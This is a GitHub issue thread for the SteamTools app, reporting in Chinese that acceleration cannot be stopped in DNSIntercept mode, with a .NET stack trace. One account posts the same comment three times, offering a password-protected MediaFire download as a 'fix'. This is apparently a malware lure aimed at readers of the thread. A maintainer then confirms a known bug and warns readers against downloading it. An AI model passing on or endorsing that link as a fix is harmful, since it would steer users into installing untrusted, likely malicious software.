### ISSUE TITLE
🐛[BUG] 在DNSIntercept模式下无法停止加速

### ISSUE THREAD

**Issue by hwf1324** [BeyondDimension/SteamTools#3457]
## 请认真检查以下清单中的每一项
- [x] 已经搜索过，没有发现类似的 issue
- [ ] 已经搜索过文档，没有发现相关内容
- [x] 已经尝试使用过最新版，问题依旧存在
- [x] 使用的是官方版本（未替换及修改过安装目录程序文件）

### 🐛 描述

在DNSIntercept模式下无法停止加速，加速时间也没有变化。

PS：如果是启动时自动加速的话点击停止加速不会有截图里的错误提示。

### 📷 复现步骤

1. 加速模式选择DNSIntercept
2. 点击一键加速
3. 点击停止加速

### 📄 日志信息

```log
2024-08-27 10:15:12.0084|Error|ProxyService|OnStopedShowToastReturnProxyStatus Error | System.ArgumentNullException: Value cannot be null. (Parameter 'bytes')
   at System.ArgumentNullException.Throw(String paramName)
   at System.IO.File.WriteAllBytesAsync(String path, Byte[] bytes, CancellationToken cancellationToken)
   at Mobius.Helpers.WinDivertInitHelper.InitializeAsync()
   at BD.WTTS.Services.ProxyService.StopProxyServiceCoreAsync(Boolean isExit)
   at BD.WTTS.Services.ProxyService.StopProxyServiceAsync(Boolean isExit)
2024-08-27 10:22:53.8061|Error|ProxyService|OnStopedShowToastReturnProxyStatus Error | System.ArgumentNullException: Value cannot be null. (Parameter 'bytes')
   at System.ArgumentNullException.Throw(String paramName)
   at System.IO.File.WriteAllBytesAsync(String path, Byte[] bytes, CancellationToken cancellationToken)
   at Mobius.Helpers.WinDivertInitHelper.InitializeAsync()
   at BD.WTTS.Services.ProxyService.StopProxyServiceCoreAsync(Boolean isExit)
   at BD.WTTS.Services.ProxyService.StopProxyServiceAsync(Boolean isExit)
2024-08-27 10:22:54.2049|Error|ProxyService|OnStopedShowToastReturnProxyStatus Error | System.ArgumentNullException: Value cannot be null. (Parameter 'bytes')
   at System.ArgumentNullException.Throw(String paramName)
   at System.IO.File.WriteAllBytesAsync(String path, Byte[] bytes, CancellationToken cancellationToken)
   at Mobius.Helpers.WinDivertInitHelper.InitializeAsync()
   at BD.WTTS.Services.ProxyService.StopProxyServiceCoreAsync(Boolean isExit)
   at BD.WTTS.Services.ProxyService.StopProxyServiceAsync(Boolean isExit)
```

### 🖼 截图

![图片](https://github.com/user-attachments/assets/e10405ee-5dd3-4d3b-a990-517e9a3f1613)

### 🚑 其他信息

- 处理器体系结构：x64
- 系统版本号：Windows 11 Version 22H2 (OS Build 22621.4037)
- 下载渠道：GItHub
- 程序版本：v3.0.0-rc.9
- 是否包含独立运行时：

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rmbadmin** [comment]
这是个已知问题，会在下个版本中修复，现在暂时不要使用dns加速模式即可，以及也不要随意相信上面的回复下载奇怪的软件
